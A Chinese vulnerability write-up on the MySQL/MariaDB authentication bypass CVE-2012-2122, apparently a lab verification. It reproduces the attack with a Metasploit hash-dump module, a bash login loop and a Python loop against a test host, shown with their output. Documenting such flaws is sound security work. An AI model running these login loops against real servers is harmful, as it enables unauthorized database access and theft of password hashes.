一、漏洞简介

当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。按照公告说法大约256次就能够蒙对一次。

受影响的产品:

All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

二、漏洞危害

只要知道用户名,不断尝试就能够直接登入SQL数据库。

三、漏洞验证

 1、metasploit

msf > use  auxiliary/scanner/mysql/mysql_authbypass_hashdump

msf auxiliary(mysql_authbypass_hashdump) > info 

       Name: MySQL Authentication Bypass Password Dump

     Module: auxiliary/scanner/mysql/mysql_authbypass_hashdump

    License: Metasploit Framework License (BSD)

       Rank: Normal

  Disclosed: 2012-06-09

Provided by:

  theLightCosine <theLightCosine@metasploit.com>

  jcran <jcran@metasploit.com>

Basic options:

  Name      Current Setting  Required  Description

  ----      ---------------  --------  -----------

  RHOSTS                     yes       The target address range or CIDR identifier

  RPORT     3306             yes       The target port (TCP)

  THREADS   1                yes       The number of concurrent threads

  USERNAME  root             yes       The username to authenticate as

Description:

  This module exploits a password bypass vulnerability in MySQL in

  order to extract the usernames and encrypted password hashes from a

  MySQL server. These hashes are stored as loot for later cracking.

References:

  https://cvedetails.com/cve/CVE-2012-2122/

  OSVDB (82804)

  https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 192.168.118.130

RHOSTS => 192.168.118.130

msf auxiliary(mysql_authbypass_hashdump) > run 

[+] 192.168.118.130:3306  - 192.168.118.130:3306 The server allows logins, proceeding with bypass test

[*] 192.168.118.130:3306  - 192.168.118.130:3306 Authentication bypass is 10% complete

[*] 192.168.118.130:3306  - 192.168.118.130:3306 Authentication bypass is 20% complete

[*] 192.168.118.130:3306  - 192.168.118.130:3306 Successfully bypassed authentication after 207 attempts. URI: mysql://root:iTk@192.168.118.130:3306

[+] 192.168.118.130:3306  - 192.168.118.130:3306 Successfully exploited the authentication bypass flaw, dumping hashes...

[+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

[+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

[+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

[+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

[+] 192.168.118.130:3306  - 192.168.118.130:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9

[*] 192.168.118.130:3306  - 192.168.118.130:3306 Hash Table has been saved: /root/.msf4/loot/20180829155507_default_192.168.118.130_mysql.hashes_835663.txt

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(mysql_authbypass_hashdump) >

 2、Linux shell

root@kali:~# for i in `seq 1 1000`; do mysql -uroot -pwrong -h 192.168.118.130  ; done

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

Welcome to the MariaDB monitor.  Commands end with ; or \g.

Your MySQL connection id is 1513

Server version: 5.5.23 Source distribution

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]>

MySQL [(none)]> select version();

+-----------+

| version() |

+-----------+

| 5.5.23    |

+-----------+

1 row in set (0.00 sec)

MySQL [(none)]>

 3、Python

主要调用了subprocess.Popen执行shell命令:

#!/usr/bin/python

import subprocess

while 1:

        subprocess.Popen("mysql -h 192.168.118.130 -u root mysql --password=blah", shell=True).wait()

具体执行过程:

root@kali:~# python test.py

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

ERROR 1045 (28000): Access denied for user 'root'@'192.168.118.128' (using password: YES)

Reading table information for completion of table and column names

You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.

Your MySQL connection id is 2697

Server version: 5.5.23 Source distribution

